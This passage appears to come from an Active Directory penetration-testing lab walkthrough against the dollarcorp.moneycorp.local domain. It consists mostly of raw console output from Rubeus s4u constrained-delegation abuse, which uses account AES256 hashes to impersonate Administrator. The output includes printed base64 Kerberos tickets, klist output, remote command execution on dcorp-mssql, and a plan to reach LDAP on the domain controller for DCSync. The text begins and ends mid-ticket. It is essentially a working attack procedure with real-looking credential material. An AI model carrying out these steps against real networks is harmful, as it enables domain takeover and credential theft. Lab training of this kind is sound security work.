2lntoQLeIzg2kjVHRhVQpBx5pl0hb36ofBAxKmTMVfbkVwwYkNo6h2/psWjugRd3MIjhumGT2uFjALGw
bWiYJwxu7pmXJVBFwzZOKUdHisO+YoA0DJoolkKE/fCb7QHY5CgedW6fTEOL8ZsumQtDx97U1PLM2WRo
vz0ibgaINYm1VjfUGOz9ec+nIFguCtD4d+2w6EdtQCZgOZ1JWwL+75coQ36MQP9WCmaqofbjIWZKilfa
BuKaS2LifGMTu+GCd3qrOuVgDrPu38W6+F60TYDKeV4YHbs+HxPcwvfVfe03QHc4XhvtM2X/MJu6NbSL
+0Qt521DUJKHEE6pDH+wK1lhc/L6U60P0hRtqv2CJbDX16y0CE3RIciGeUE4GHIf28BDaWzjC1MJ0QZD
9dkHnJYUTm9KkcqZixViN93CFjwvcwYVZXNh5I1XmLqjy6bjNY5fx2uXdWJSAwie8gqfYX5VQ6/AnTz0
9nhaKQJEOkOGvUUUzQHydD3h4UNQqjZ5FjLmSXi7rQKnhIYiwGjz8G6y03gVWYh1FbBipPyP3GaLeQ2i
tI9v3v7t+fmY3KS/jOPwOAz9ExlRxiKLJusRJ+tnBtuCKoSTkPX40DYvkESdahn2KDaxWWLTJREmngqo
OJIPcp/0bC8jZwrW3qjxTBlS/khoiJYtooibmhDoXIa/BCkhODLM+kv/crNtDnp0mEiTK3z5hWSDEXl9
vi2M6XDNg3FxzLTTeNhZfpYdY8M7Q8DCBCJ9OtLTJ0THW0Ds9O+g2Tb27R22NML68KDGl4kyICgZoJCn
OQpwX0jwZLqAOLBYuhwAbtRcgVC3AbLi2Sjacl1Vr4j5RJRsQ9IapPq50LzRY40rPyFiFCm9b7meYRFM
/OTJ6e+l6sG51bkBuBcRM2cVci4/Ru2GO7sUr30P7NUGvgVGT2ntFsSB+wpH3haIz/5CaC6jvKiDs5eC
XSLwNkSY31jrvCkEBB+QoKG/6GBqJh6RgvZpEzsIxPEGR8j4Qb2d6j2MyDnzzYcuoLzOxFv8+QRaI4Kz
No3sf8WJlK2NOvCjggETMIIBD6ADAgEAooIBBgSCAQJ9gf8wgfyggfkwgfYwgfOgGzAZoAMCARGhEgQQ
pCCk9mZsYIQLVng2IUCTNqEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8b
DUFkbWluaXN0cmF0b3KjBwMFAEChAAClERgPMjAyNDA3MDMxNjE4MDhaphEYDzIwMjQwNzA0MDIxODA3
WqcRGA8yMDI0MDcxMDE2MTgwN1qoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypOjA4oAMCAQKh
MTAvGwVycGNzcxsmZGNvcnAtbXNzcWwuZG9sbGFyY29ycC5tb25leWNvcnAuTE9DQUw=
[+] Ticket successfully imported!

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe s4u /user:websvc

/aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
/impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL
/altservice:host /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash:

2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\websvc'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF5jCCBeKgAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BFswggRXoAMCARKhAwIBAqKCBEkEggRFX/AouVoTyiyz3Sec8lWxWIIMIlL3u3KiH5naVxQEdY2eofCZ
ZAPG4lskjsVSfvQ91j0q1Lvb1SREG99FT1vd6vC0+r4YHtGWfnkjsKqyvxUlPGopRCbVVhL+bRNb4JID
fxEZkgnmfKTxvxaOF8Be2HmDzRJb7icWfk0lqhEaRQqHrHax+NU/zU0FuHYRjraLgwVR3755DPv1WXTA
Vhn0+w4JNHdHteKRW1M6u6Tg0JSt0cUlW6yPe8rYuA7cQmsjMU+2UVdSguWsgwVMjNZmIRs3Sg8HUnd+
xJWxNQusgH7CRGyZ7BcO95a0/rLyiL24JgQxR+dEjZ4+rn1WNG2KA+DKZs0rIIAWeix1Tblh2tMqQeWQ
OL1qYGNErX2iZuNo+OhHsB7sVWq5o4eg1rIW/dV5avVxGYr5ZwgjOVi6VzWjFYI0WO+xxanhtd5XrUeh
YoByJ6VAOOg4hrV8YNFPx3wBdVnZ8vMhntb/hm6w94LES+l3Uj6Im4G/GQZct80ICzLGuhZiFfpQf74C
FfA0YVrZ2cNmTE7BGj00Y98rhhYk4MgRBMS6KwtBPgQW95uovqD6RfrupzYAHyiaXDts7NNphDupAFrM
 gPUV8wlkJt+IbZ0j141iTaiEKtkZKMfNaxQnTwF+nKasTrvTwqv3S2b49KoamgaemTstRt5iNpWCoFWL
WkxWSAO3aGutcMC6MB2qn5O4uDoEnhigUSitx+gYv8NFt8bIAzXkMmDWcCL9L46Lo5jSasTgmqsxeJ6Q
KiNX/HrQIVPApCs4E8x1aDZNN0DZ9gg2DMDwW3igm4rsi5g/spWVhb08cfvkDtnbVBz3cm58aCn62aVO
vfVKZrqYK6op2YXDMRYiiOvW6/az6BwAX9PGlho5uVV5Ockep1euDYyx4dSB24aeHmWjdEQhancwcIrK
9lEmLxTU9efepIyKMjD/pNC2a6ZSPJaKFEX+xOwSi85+kHawbp2w9cSSnVt6mfGxhZMsTSv7fmMqlN88
pUVeM25Mm5ETBPQqPeXkPXYL0upq3y4XXmL1yZ0Ejl9XCniNtHP3pIv9Pm7l3+NQr8qV9RvT1cJfCQuY
9T8hWx0ZlA0SRg487CKFuNox8tm3D4bt2KwSOEdrdbVwXThR7q1HoBNei6w0AJnq+a4EymivbtPrwxWB
5hXY3cwiSNlJnps70rNtI/noLyHomeBXDtYaPM5KMU39LyRYTiwfth9pNDOFSJHM67wGzNskSMB/64Ve
hrA6qitaFl6jNvbDd/6z0nc7n2kTPv1MSA3M0b7lZnnAcdlcl3dbANgDgccv/fqKSw0yXUKO7Yh2oqxT
GIwR0bedcHq/MKJciiI/p6il57iVG2IAf2j7YDLV+NWK5XJ0fWRF58MswUH8P2koR2WFvwkBJUHeSxzX
Dx+gaHQ6VzB3SKw/49r3/JMv/c2KeqtQZs5692IXcH7CutpUW6OCAREwggENoAMCAQCiggEEBIIBAH2B
/TCB+qCB9zCB9DCB8aArMCmgAwIBEqEiBCDAQIHtB7q4qppMnf9RwSfurIIWEzwfmdCZgSu09Ou5bKEc
GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKITMBGgAwIBAaEKMAgbBndlYnN2Y6MHAwUAQOEAAKUR
GA8yMDI0MDcwMzE2MjAwMFqmERgPMjAyNDA3MDQwMjIwMDBapxEYDzIwMjQwNzEwMTYyMDAwWqgcGxpE
T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaZG9sbGFyY29ycC5t
b25leWNvcnAubG9jYWw=

[*] Action: S4U

[*] Building S4U2self request for: '[email protected]'

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to '[email protected]'
[*] base64(ticket.kirbi):

doIGTDCCBkigAwIBBaEDAgEWooIFPjCCBTphggU2MIIFMqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMohMwEaADAgEBoQowCBsGd2Vic3Zjo4IE9jCCBPKgAwIBF6EDAgECooIE5ASCBODR2e4p
heXQx9H7PQuAZISTOxMc9FUZV8dBEaZcRtwNgiJNLuQz51zW/sFYDZTs1kH+GjPbHGYWvyY2zQfS964z
I93O5S/Wvr+jNiICHjHkT4Y4HimuQFvuvfgVrSTBRrjztAcb6qqHghrWpyGluanHlJANw6biVNrxRuv8
AaUzzH5aJWnvMJxbS3mMecwwpDZ2RWkk8STXKXzh7KyMuyOUkfonIZMKEulMTwFYvt/dm260t05S4cF8
Ka6zd2BIUrafxvWCoksWB83iYYCvK7e5KW5fW2c6rZaMAh8vWWxqxhnjdMe2RzC2yIsWKCJDK4jfWp+y
kDNrRTtNpCAoAvS/osSewO8yBDtUgRNekae+ngFTI7cls5Ve2pLH9uFVRotBPKK/MZocVstw5wALeGcb
Xqtf8WSfnqa/JJ8tXg3Y4SxhffPfhUMEtU8Z3E3zJVSIE/6y4wIKOLwn/5XvS7UPUSTs6gBCSePFbnGe
/UDCiHsOi89B2aC2RiEpBlwiUHuBEMShn6FRTHvmiLR334Bi8KrYfS3SDgWB7TTo+gxxB5R0k4Z+EU8N
oc7yYvHrjmxyz+hLGZNV9TmGstbm6RzHvG0GYrS3i4t6G2nw0bwBC1BdL97KXjJoab2n7vplZLrNtnET
+Lefxs7d7dLS0H1qXlNLSTZ6mwhQw+8617zonDtWPgt39hMGGILjLib+wQCcXXldk0Pg8J+0g9WxqdD8
FTksMRiO6cN1VTtfVFNegop4kVfVNNO+A8q1khhF+a7mIQBQm+y/+RRpKqkmpqzBmzLPbYIEXhSV2WhM
8jmxd6Wu6Nu55Pgzly2SxibJTgn5zvEUV/3YveGS9f+E5d+DFk6S8C70B1cPmEZ84gf5qMPowndozexy
w4xa303IhY6aFYMHdNRDl/o+iPLAuvYd3lmf757WvDVqYx99uLToF8ZTxE0CiLGgARPXRzU1QZacOAhI
Q0H6NGqgBaoAdlIR1eE1VML2AVp77QQEr8ee2aJUS4K2i0irDNwGv2RG7/O7QpQrdkWXeHYy3rxheDw4
7ly53+AUUXCWMdlU6wHqPzeeGztwVXNbIPHRoffc5TgKABxuAczPXhvekD7OLczjQazmOjsH2wChwW5x
8oS2tINWopDnIVvDP24soyvhUChjHDxjyCIVhj50jhYTEuyG9lUw/HZgHTIz/SYfK9RMKbT+ldA37MVI
cPjxjqybewvUnyY8gtY7s1Vm1k4u2v698gmGow/lBoHGCcsvi/LfvP2Xd+WjWclKDH3Ti2NRBdsjfm/+
1Ov8RB4BHyMIiOj6cB+SBl8TxFPbgDB/tTvfQjllEu1c4BZASBHo0Yij5Pw3kku95Ubf3DXlp6iPzOGe
gpLEwknbXyBBfGs5IUQtOE94YgCfV818adBGIQfQkhmr9adDWae2qC9ijyc4KF8Vzw9Io+p8zo8pPMjL
00bCUshSuuIXPPpZZZKTSYdimZ4Fj5shBjS6L29+1zM9A5hvm9ycLusbYdxyOrEDjpC8QaHIvWQ2zf/K
nW6+igVn3yrcqb8w6cD++cuPxCW+okfk16lzXiS36qJ5FHI0jLmU36Kk99ZfHe00MLrxfzqQMIzDpAp1
7gK6sSRNPfJHXsdG+mcc2CGOYoJYFdrwMUvFWgvR+SLTJM6Ijr/D6POZhjujgfkwgfagAwIBAKKB7gSB
632B6DCB5aCB4jCB3zCB3KArMCmgAwIBEqEiBCCzPgWwD+J5ZLKmetrpuuxZAW2zcSTAjfaYzVprVFhj
OaEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3Kj
BwMFAEChAAClERgPMjAyNDA3MDMxNjIwMDBaphEYDzIwMjQwNzA0MDIyMDAwWqcRGA8yMDI0MDcxMDE2
MjAwMFqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypEzARoAMCAQGhCjAIGwZ3ZWJzdmM=

[*] Impersonating user 'Administrator' to target SPN 'CIFS/dcorp-

mssql.dollarcorp.moneycorp.LOCAL'
[*] Final ticket will be for the alternate service 'host'
[*] Building S4U2proxy request for service: 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'host'
[*] base64(ticket.kirbi) for SPN 'host/dcorp-mssql.dollarcorp.moneycorp.LOCAL':

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
[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x847a8

Cached Tickets: (5)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL

Server: host/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 7/3/2024 9:20:00 (local)
End Time: 7/3/2024 19:20:00 (local)
Renew Time: 7/10/2024 9:20:00 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

#1> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL

Server: rpcss/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
 KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 7/3/2024 9:18:08 (local)
End Time: 7/3/2024 19:18:07 (local)
Renew Time: 7/10/2024 9:18:07 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

#2> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL

Server: http/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 7/3/2024 9:18:00 (local)
End Time: 7/3/2024 19:17:59 (local)
Renew Time: 7/10/2024 9:17:59 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

#3> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL

Server: CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 7/3/2024 8:33:39 (local)
End Time: 7/3/2024 18:33:38 (local)
Renew Time: 7/10/2024 8:33:38 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\Windows\system32>Powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-mssql.dollarcorp.moneycorp.LOCAL -

ScriptBlock { $env:username;$env:computername }
Administrator
DCORP-MSSQL
Using dcorp-adminsrv$

PS C:\Windows\system32> Get-DomainComputer -TrustedToAuth

pwdlastset : 11/11/2022 11:16:12 PM

logoncount : 80
badpasswordtime : 5/18/2024 3:13:09 AM
distinguishedname : CN=DCORP-
ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 6/26/2024 9:02:25 PM
whencreated : 11/12/2022 7:16:12 AM
samaccountname : DCORP-ADMINSRV$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
whenchanged : 6/27/2024 4:02:25 AM
accountexpires : NEVER
countrycode : 0
operatingsystem : Windows Server 2022 Datacenter
instancetype : 4
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION
objectguid : 2e036483-7f45-4416-8a62-893618556370
operatingsystemversion : 10.0 (20348)
lastlogoff : 12/31/1600 4:00:00 PM
msds-allowedtodelegateto : {TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL, TIME/dcorp-DC}
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/15/2022 4:16:45 AM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {WSMAN/dcorp-adminsrv, WSMAN/dcorp-
adminsrv.dollarcorp.moneycorp.local,
TERMSRV/DCORP-ADMINSRV, TERMSRV/dcorp-
adminsrv.dollarcorp.moneycorp.local...}
usncreated : 13891
usnchanged : 1164786
lastlogon : 7/3/2024 8:38:27 AM
badpwdcount : 0
cn : DCORP-ADMINSRV
msds-supportedencryptiontypes : 28
objectsid : S-1-5-21-719815819-3726368948-3917688648-1105
primarygroupid : 515
iscriticalsystemobject : False
name : DCORP-ADMINSRV
dnshostname : dcorp-adminsrv.dollarcorp.moneycorp.local

If we can compromise the machine account of DCORP-ADMNSRV, we can access the TIME service on the
machine dcorp-dc.dollarcorp.moneycorp.local as any user including domain admin. We have already
obtained the hashes of the machine dcorp-adminsrv.

As already mentioned, since the privileges are only checked, not the service, we will use the /altservice
flag in Rubeus to access the LADP service on the dcorp-dc.dollarcorp.moneycorp.local. Once we have the
TGS for LDAP on the domain controller we can execute the DCSync attack.
C:\Windows\system32>c:\Ad\Tools\Rubeus.exe s4u /user:DCORP-ADMINSRV$
/aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
/impersonateuser:Administrator /msdsspn:TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:LDAP
/ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash:

e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\DCORP-ADMINSRV$'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGazCCBmegAwIBBaEDAgEWooIFODCCBTRhggUwMIIFLKADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BNQwggTQoAMCARKhAwIBAqKCBMIEggS+0DplS0fpgI4JpksOiBWQoG2ILha23guNAOheYrLC5sPmDMWZ
v9WfoqOAR+wckbW+8VDrCxS7pcaxDNTnIapEovE3xMdRA8Pmiac5/EXskBbbsdLOwuKTkGpCazHkSWJ0
EHC/NuNsEYrPe7fAWZ2E6a7q4RR9WJREAEbFHmYQEXf8QPV7Cjxh0OcXnG0bdfSFAIiugfksCMMG5tkw
4VnvakX+EixrARACbuNYp99qpjb1f8uTjVOcqrYXgiRY7IqhdOtuIxBlKtX781xKGfocMZD4Lcv80tEz
3YRVgP8nBYVv6XbUES2fBCAaeV+sWVH/doGKACY5/5cZIsx9BjeC7UrsVNW26kmx/hdcj58MA/mXv4Js
nAgwDNwLMCITjDWJob7WzABg419xpan5u4BUs9jBrAh1gbdyfqSiJjlkFNjrcBXR+NlA03eJn02VUfN4
WEzdfDRM/I+HBaYtJ806cLBhl0g+vFbsC5RU2DaMwCc9RgOuM+k2VsUMr1kSMl9hZKp53AiY0uqSaQxJ
ZwzIF5ZO6pJpOon/WHOJl1c2zsfJ5QkUxIO4C7vL841/DfjQrE5r0Q0YlPbjamslN4ROUpTZVRhTyFbA
59hPRcBNlDMl1AWIuGDNhQAumKCI9oOMAoi8Qoi3RxSBNy003spWN8dOBukIzy2hoGiO1uWFZ8B421oW
HTI4hikaPchc9yoQBCDga+TVEmaHACRUI0ip8NilTmdnVrK/piybU5umkUw6gFpWLsVEruxbkPu5zsnv
mtJBrVBP+wRoWZbeoL40Mg2OdlyX1VFt/MO1vCEkwSa1cXKmmFQI4F8pNJKGrEBvz0Rbir+JXHH8Eq+G
DGLNjv1ZqbdmYt7csv30XeDIhOwM/sz2t9eeu++YYfaHwp2DQcOPmyhWVI6iZejnHCe+GVn7yD53Pm9/
VMd39KD6RWxYzV8w9HJZEeKZFPyVRc8ReI1x9jmme3qqh+hlxCCPa1rDX+JP1n0fyyDvhDBYhXErQsvv
TDAAkKLCYsSJbjGyF4cTnPu79NIB1gpfCzmjH1sMrsP9QR2kxwIqrfUeRINy3/aZazYc1SyrWc9YSZFE
e6e7SpdmjOsxRXcEPtU5fS/qhGugHH2hJKlpslh2EHSGyCnldfSh0/Hia99/yU+9qNfxSAOWoSxfTB/g
HxggfRxPWLQ3wZwfBXjg+N7qEJ8gdCr+72yxzF3OqOw5d6zVQVKt5h/8uzxQ0hGTEsqNm3vjijpAJqiY
tuyrOXPwYWv6sWAKSP+DN/65PnE889wuzVUbgSj1lacVf2+7NESCrVGm/xYmotI2uKOOygCYJZtAgOqw
ALabMZhmqBhjIUiI39LF+zyATWuJCSOqdfsW4HJJiCLMU2ntfHLBQ++WCoZgG5WpddFX9wWespQlAKeT
Qqwy/o2H1JbYYinxDDSCr9bq17o8zhN5l4jcB8c1a1h5WWO6QxS43epyPRXd9dI2ujFz4sbQNz5yFv5i
/5arTYt5VNTv5OzD6zA4I2AyrzdZkbDn4Ujbqncz1K0HAgTLPlmRIgzCfz/tITD0vACu2Uz+933wNLOR
ba8i5y4ZmXNb3WHo9IOSXFAES7Ic8S2WI3CAcjPrd2i6YhAayw+jggEdMIIBGaADAgEAooIBEASCAQx9
ggEIMIIBBKCCAQAwgf0wgfqgKzApoAMCARKhIgQgjNTlZ0SaHPeklcWeCeeE+crl1yVho2CB+OgAQDJ7
iu2hHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiHDAaoAMCAQGhEzARGw9EQ09SUC1BRE1JTlNS
ViSjBwMFAEDhAAClERgPMjAyNDA3MDMxNzM1NDhaphEYDzIwMjQwNzA0MDMzNTQ4WqcRGA8yMDI0MDcx
MDE3MzU0OFqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3Qb
GmRvbGxhcmNvcnAubW9uZXljb3JwLmxvY2Fs

[*] Action: S4U

[*] Building S4U2self request for: '[email protected]'

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to '[email protected]'
[*] base64(ticket.kirbi):

doIGWzCCBlegAwIBBaEDAgEWooIFQzCCBT9hggU7MIIFN6ADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMohwwGqADAgEBoRMwERsPRENPUlAtQURNSU5TUlYko4IE8jCCBO6gAwIBEqEDAgEBooIE
4ASCBNxBTr9qsCDp/ZO3YZugSTO+4HAd5vGGAQayvysbStYSEUrFpNgYuo+HYFvXqYRq4Thyjpjcl55E
eSALAJJZNXxcVHzP5MluTJmvNB5czhrhh+TH2A1cUQM3Nppa7BE4B+C0oEFLyjG2bda1pt6a6Mt4DkUS
npL736MjpAJfdU+FSjF51HHXpAeO7XHWl+7NozcvY0Kc6BN9kwaeiLgq7P/vmv6YYlrODh7e0dc54eld
NeMB7XRYhGlOx/d6ky7CyWqW70IwV6jqzxIXmVan5GdtCienBHfDFi8EPZKg4AMuq1/YkENHdKesHSKX
NyLTpvxbGELLWK/EFoMtExWz7lAD/AFzn9YabylisJAuDdbfbrfbCe/T35BSNzt5nuxZBunzMAvI8xvC
fmq0gyABgQF7pRlyp9+j7U5IjW9oztLZIgeQSvGnRZ5ldvY1xxmEUG1j7M+24/8DqYJ8B1wat1SaNezb
dheWISd0KJ4eF2Gc2S4h2o7EzW7oeFxRmCHVzCNNZrii3LjXOYUpkifORbG1e+pyyt3n6fnDpKdRHIJc
1IFFeHSkEzK0Aa7z42W9jqUovqIOAu7+PY9dLqKfrglWZBQ2JEeE9U5l8lTRYiTJ3EDRBreZS9nm/xOC
d0DKDWDbuQgo+/G2XsZeNxGQ4NJz6z0HTXoPTcHKj1ez0v2oLx0rWPhcUcjCSxH4c34SfsFObjDfB1RS
9IqCRF+Z5Ahuo993Wk05dQ6rsdAlbNoOqf+q0QGIH8llYqzaoPKvP+QdVDkCRZBQJB0X+GlSNdN5P+qX
L8dFBMr3pnCUzqiVg3YLYKib4ddR1WKCkIcMVjntOYwCQgiEb4J+NZl3KWAfruRMNNWskno2oczQcQL8
